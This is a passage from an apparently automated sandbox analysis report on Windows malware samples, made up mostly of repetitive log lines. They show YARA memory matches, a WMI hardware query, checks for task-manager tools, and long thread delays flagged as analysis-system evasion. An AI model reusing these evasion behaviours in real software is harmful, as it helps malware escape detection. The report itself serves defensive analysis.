                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: Yara match  File source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara match  File source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara match  File source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Source: Yara match  File source: 15.2.regasms.exe.3230128.0.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 13.2.regasms.exe.28be350.0.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 13.2.regasms.exe.28d0c2c.1.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 15.2.regasms.exe.321d84c.1.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 13.2.regasms.exe.28d0c2c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 20.2.regasms.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 13.2.regasms.exe.28be350.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 15.2.regasms.exe.3230128.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 15.2.regasms.exe.321d84c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 21.2.AtkzppDHiyvcIR.exe.2949bdc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 21.2.AtkzppDHiyvcIR.exe.2937300.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match  File source: 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match  File source: 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match  File source: 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match  File source: 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match  File source: Process Memory Space: regasms.exe PID: 6696, type: MEMORYSTR
                  Source: Yara match  File source: Process Memory Space: regasms.exe PID: 7260, type: MEMORYSTR
                  Source: Yara match  File source: Process Memory Space: AtkzppDHiyvcIR.exe PID: 7628, type: MEMORYSTR
                  Source: Yara match  File source: Process Memory Space: regasms.exe PID: 7464, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                  Source: regasms.exe, 0000000D.00000002.1403401343.0000000002827000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 0000000F.00000002.1440771055.0000000003217000.00000004.00000800.00020000.00000000.sdmp, regasms.exe, 00000014.00000002.1519769182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AtkzppDHiyvcIR.exe, 00000015.00000002.1540173205.0000000002935000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: A10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 27D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: DB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 89B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 99B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 9BC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: ABC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 2F40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 3120000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 5120000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 93C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: A3C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: A5D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: B5D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: F60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 29A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 2780000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: B90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 2850000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 25F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 8CD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 7750000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 9CD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: ACD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 3090000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 3130000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Memory allocated: 5130000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: F70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe  Memory allocated: 4A60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe  Memory allocated: 1470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe  Memory allocated: 3140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exe  Memory allocated: 5140000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239844
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239703
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239594
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239483
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239375
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239266
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239141
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239010
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238904
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238797
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238677
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238558
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238451
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238294
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238157
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 238034
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 237726
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 237367
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 237171
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 237047
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 236932
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 236806
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 236652
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 236469
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239875
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239715
                  Source: C:\Users\user\AppData\Roaming\regasms.exe  Thread delayed: delay time: 239532
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239407Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239277Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239156Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 239031Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238919Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238812Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238697Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238593Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238475Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238250Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 238110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 237532Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236953Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236672Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236492Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236367Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 236157Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 239578
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 237203
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 237093
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236984
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236874
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236765
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236656
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236546
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236433
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236313
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236187
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 236077
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235968
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235857
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235743
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235639
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 235514
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 234291
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 234021
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233723
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233482
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233374
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 233166
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\regasms.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 240000
                  Source: C:\Users\user\AppData\Roaming\NotepadUpdate.exeThread delayed: delay time: 239781
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1412Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1355Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1205Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 714Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5463Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1651Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeWindow / User API: threadDelayed 690
                  Source: C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exeWindow / User API: threadDelayed 3600
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6370
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 588
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 8259
                  Source: C:\Users\user\AppData\Roaming\regasms.exeWindow / User API: threadDelayed 1592
                  Source: C:\Windows\System32\loaddll64.exe TID: 6096Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239844s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239703s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239594s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239483s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239375s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239266s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239141s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -239010s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238904s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238797s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238677s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238558s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238451s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238294s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238157s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -238034s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237726s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237367s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237171s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -237047s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236932s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236806s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236652s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 520Thread sleep time: -236469s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 4692Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7380Thread sleep count: 1205 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239715s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239532s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239407s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239277s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239156s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -239031s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238919s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238812s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7380Thread sleep count: 714 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\regasms.exe TID: 7348Thread sleep time: -238697s >= -30000sJump to behavior
